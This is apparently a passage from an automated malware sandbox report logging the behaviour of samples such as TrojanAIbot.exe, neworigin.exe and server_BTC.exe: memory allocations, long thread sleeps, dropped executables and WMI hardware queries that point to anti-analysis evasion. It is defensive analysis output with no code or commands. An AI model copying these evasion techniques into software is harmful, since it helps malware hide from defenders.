                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2780000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 4780000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 1160000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2BA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2AE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 1470000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2DA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 4DA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 10F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2D70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2C90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 30B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 32F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 52F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 13E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2F90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 4F90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199968
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199859
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199750
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199640
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199531
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199422
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199312
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199202
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4765Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 1708Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7244
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 2893
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 6894
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 6957
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 2689
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 5196
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4649
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeDropped PE file which has not been started: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI coverage: 9.8 %
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -200000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3452Thread sleep count: 4765 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -99792s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -99578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -99227s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -99027s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -98915s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -98788s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -98667s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -98560s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -98454s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -98310s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -98167s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -97929s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -97796s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -97680s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -97578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -97466s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -97349s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -97213s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -97089s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -96966s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3452Thread sleep count: 1708 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -96808s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -96390s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -96268s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -96144s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -96020s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -95893s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -95765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -95653s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -95542s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -95430s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -95320s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -95200s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -95087s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -94968s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -94853s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -94743s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -94634s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -94495s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -94377s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -94244s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -94113s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -93977s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -93660s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -93392s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -93166s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -99853s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 2224Thread sleep time: -99688s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 5880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep count: 7244 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep count: 33 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1360Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3200Thread sleep time: -173580000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 3200Thread sleep time: -413640000s >= -30000s
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 2636Thread sleep count: 37 > 30
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 1868Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep count: 36 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -33204139332677172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -200000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7460Thread sleep count: 6957 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -99825s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -99378s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98963s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98847s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98718s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98603s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98484s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98353s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98220s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98089s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -97956s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -97754s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -97499s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -97358s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -97238s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -97100s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96991s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96789s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96199s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95705s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95481s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95325s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95156s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94986s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94810s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94636s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94311s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94191s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94042s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -93915s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -93745s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -99852s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -99690s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -99555s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -99394s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -99226s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -99059s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98628s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98368s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98223s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -98056s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -97817s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -97245s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -97005s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96861s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96702s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7460Thread sleep count: 2689 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96591s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96480s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96368s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96263s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96151s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -96032s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95904s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95794s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95685s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95576s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95467s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95357s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95248s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95139s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -95019s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94899s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94639s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94495s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94283s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94154s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -94044s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -93931s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -93825s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -93717s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -93607s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -93498s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -1199968s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -1199859s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -1199750s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -1199640s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -1199531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -1199422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -1199312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7512Thread sleep time: -1199202s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 4628Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -36893488147419080s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -99873s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -99757s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -99641s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -99528s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -99420s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -99310s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -99201s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -99091s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -98983s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -98873s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -98764s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -98654s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -98545s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -98436s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -98327s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -98210s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -97967s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -97824s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -97611s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -97483s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -97372s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -97260s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -97153s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -97045s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -96936s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -96826s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -96716s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -96608s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -96498s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -96389s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -96280s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -96170s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -96061s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -95951s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -95842s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -95733s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -95620s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -95514s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -95405s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -95295s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -95165s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -95027s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -94906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -94635s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -94527s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -94420s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -94311s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -94202s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -94092s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -93983s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5824Thread sleep time: -93872s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6096Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 372Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
